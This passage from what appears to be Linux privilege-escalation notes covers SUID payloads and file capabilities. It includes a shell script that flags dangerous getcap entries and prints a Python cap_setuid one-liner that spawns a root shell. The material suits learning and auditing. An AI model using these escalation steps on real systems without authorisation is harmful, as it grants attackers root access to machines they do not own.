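if command -v gcc >/dev/null 2>&1; then
    demo_wrapper
fi
```

Whichever payload is used, the root execution must leave a root-owned file with the SUID bit; a chmod 4755 done by our own user on our own copy gives a file that runs as us.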

Capabilities

Capabilities split the privileges of the superuser into distinct units, so that a process or an executable can be granted just enough power for a specific privileged task (binding low ports, raw sockets, changing uid) without full root.

Search for files with capabilities set (getcap -r / 2>/dev/null):

Python with cap_setuid: an interpreter that carries cap_setuid (or cap_setuid+ep in getcap output) can call os.setuid(0) and then spawn a shell that is root.
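An added helper (not from the page) serving both capability sections above: it parses getcap output in both the older path = caps+ep and the newer path caps=ep formats, drops the e/p/i flag suffix, and flags the capabilities that lead to root on their own, with a one-line reason; the python payload from the page is produced for a cap_setuid interpreter. The getcap lines below are constructed; on a real host use getcap -r / 2>/dev/null | flag_dangerous_caps.

```shell
#!/bin/sh
# Added example: triage getcap output. Not from the original page.

SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/tar cap_dac_read_search=ep
/usr/sbin/mtr-packet cap_net_raw=ep
/opt/tool = cap_sys_admin,cap_chown+eip'

# Normalise both getcap formats to "path caps".
normalise_getcap() {
    sed 's/^\(.*\) = \(.*\)$/\1 \2/'
}

# Print "path capability why" for each dangerous capability. The +ep / =ep /
# +eip suffix is stripped first: e, p, i are the Effective, Permitted and
# Inheritable flags, not capabilities.
flag_dangerous_caps() {
    normalise_getcap | awk '
        BEGIN {
            why["cap_setuid"]          = "setuid(0) then exec a shell"
            why["cap_setgid"]          = "setgid to a privileged group (shadow, disk, docker)"
            why["cap_dac_override"]    = "bypass file permission checks: write /etc/passwd"
            why["cap_dac_read_search"] = "read any file: /etc/shadow, root SSH keys"
            why["cap_sys_admin"]       = "mount and namespace control: effectively root"
            why["cap_sys_ptrace"]      = "attach to and inject into root processes"
            why["cap_chown"]           = "take ownership of /etc/passwd or /etc/shadow"
            why["cap_fowner"]          = "chmod any file: set SUID on a shell copy"
            why["cap_sys_module"]      = "load a kernel module"
        }
        NF >= 2 {
            path = $1; caps = $2
            sub(/[+=][eip]*$/, "", caps)
            n = split(caps, c, ",")
            for (i = 1; i <= n; i++)
                if (c[i] in why) printf "%s %s %s\n", path, c[i], why[c[i]]
        }'
}

# The python case: an interpreter with cap_setuid becomes a root shell.
python_setuid_payload() {
    echo "$1 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'"
}

printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps
python_setuid_payload /usr/bin/python3.8
```

cap_net_raw (ping, mtr) and cap_net_bind_service are normal and not listed; they allow sniffing or binding low ports, not escalation by themselves. For anything flagged, GTFOBins has a Capabilities section per binary with the exact invocation.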
